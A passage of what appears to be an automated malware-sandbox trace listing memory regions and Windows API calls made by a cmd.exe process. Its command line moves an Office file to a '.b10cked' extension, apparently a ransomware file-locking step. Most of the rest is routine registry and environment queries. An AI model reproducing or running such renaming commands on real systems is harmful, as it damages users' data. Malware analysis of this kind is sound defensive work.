"private_0x000000007ffd5000" filename = "" Region: id = 29205 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29396 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29397 start_va = 0x20000 
end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29398 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29399 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 29400 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 29401 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29402 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29403 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29404 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29405 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29406 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 29407 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29408 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29409 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29410 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 29411 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29412 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29413 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29414 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29415 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29416 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29417 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = 
"" Region: id = 29418 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 29419 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 29440 start_va = 0x2f0000 end_va = 0x3affff entry_point = 0x2f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 657 os_tid = 0x62c [0199.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff34 | out: lpSystemTimeAsFileTime=0x20ff34*(dwLowDateTime=0xabd92360, dwHighDateTime=0x1d440a9)) [0199.708] GetCurrentProcessId () returned 0x698 [0199.708] GetCurrentThreadId () returned 0x62c [0199.708] GetTickCount () returned 0x38777 [0199.708] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff2c | out: lpPerformanceCount=0x20ff2c*=25649768744) returned 1 [0199.709] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0199.709] __set_app_type (_Type=0x1) [0199.709] __p__fmode () returned 0x76b331f4 [0199.709] __p__commode () returned 0x76b331fc [0199.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0199.709] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0199.709] GetCurrentThreadId () returned 0x62c [0199.710] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x62c) returned 0x38 [0199.710] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0199.710] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0199.710] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.710] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 
HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0199.710] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fec4 | out: phkResult=0x20fec4*=0x0) returned 0x2 [0199.710] VirtualQuery (in: lpAddress=0x20fefb, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0199.710] GetConsoleOutputCP () returned 0x1b5 [0199.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0199.710] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0199.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0199.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.711] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0199.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.711] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0199.711] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.711] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0199.711] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.711] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0199.711] GetEnvironmentStringsW () returned 0x3d0180* [0199.711] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0199.712] GetEnvironmentStringsW () returned 0x3d0180* [0199.712] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0199.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee34 | out: phkResult=0x20ee34*=0x40) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0xa8, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x0, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, 
lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegCloseKey (hKey=0x40) returned 0x0 [0199.712] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee34 | out: phkResult=0x20ee34*=0x40) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x0, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, 
lpData=0x20ee40*=0x9, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x9, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x9, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegCloseKey (hKey=0x40) returned 0x0 [0199.712] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a1 [0199.712] srand (_Seed=0x5b8863a1) [0199.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"" [0199.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"" [0199.713] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.713] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0199.713] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0199.713] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0199.713] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0199.713] _wcsicmp (_String1="PROMPT", 
_String2="CD") returned 13 [0199.713] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0199.713] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0199.713] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0199.713] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0199.713] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0199.713] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0199.713] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0199.713] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0199.713] GetEnvironmentStringsW () returned 0x3d22d0* [0199.714] FreeEnvironmentStringsW (penv=0x3d22d0) returned 1 [0199.714] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.714] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0199.714] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0199.714] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0199.714] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0199.714] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0199.714] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0199.714] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0199.714] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0199.714] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0199.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fc00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.714] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fc00, lpFilePart=0x20fbfc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fbfc*="Desktop") returned 0x18 [0199.714] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0199.714] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f97c | out: lpFindFileData=0x20f97c) returned 0x3d0010 [0199.714] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0199.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f97c | out: lpFindFileData=0x20f97c) returned 0x3d0010 [0199.714] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0199.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f97c | out: lpFindFileData=0x20f97c) returned 0x3d0010 [0199.715] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0199.715] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0199.715] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0199.715] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0199.715] GetEnvironmentStringsW () returned 0x3d2af0* [0199.715] FreeEnvironmentStringsW (penv=0x3d2af0) returned 1 [0199.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.715] GetConsoleOutputCP () returned 0x1b5 [0199.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0199.715] GetUserDefaultLCID () returned 0x409 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fd40, cchData=128 | out: lpLCData="0") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fd40, cchData=128 | out: lpLCData="0") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 
lpLCData=0x20fd40, cchData=128 | out: lpLCData="1") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0199.716] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0199.717] GetConsoleTitleW (in: lpConsoleTitle=0x3c08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0199.717] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0199.717] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0199.717] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0199.718] _wcsicmp (_String1="move", _String2=")") returned 68 [0199.718] _wcsicmp (_String1="FOR", 
_String2="move") returned -7 [0199.718] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0199.718] _wcsicmp (_String1="IF", _String2="move") returned -4 [0199.718] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0199.718] _wcsicmp (_String1="REM", _String2="move") returned 5 [0199.718] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0199.721] GetConsoleTitleW (in: lpConsoleTitle=0x20fa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.722] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0199.722] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0199.722] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0199.722] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="CD") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="REN") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="SET") returned -6 [0199.722] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0199.722] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0199.722] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0199.722] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0199.722] _wcsicmp (_String1="move", _String2="MD") returned 11 [0199.722] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0199.722] _wcsicmp (_String1="move", _String2="RD") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0199.722] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0199.722] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0199.722] _wcsicmp 
(_String1="move", _String2="CLS") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0199.722] _wcsicmp (_String1="move", _String2="VER") returned -9 [0199.722] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0199.722] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0199.722] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0199.722] _wcsicmp (_String1="move", _String2="START") returned -6 [0199.723] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0199.723] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0199.723] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0199.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.725] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f7f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f7ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f7ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", 
_MaxCount=0x7) returned -3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned 
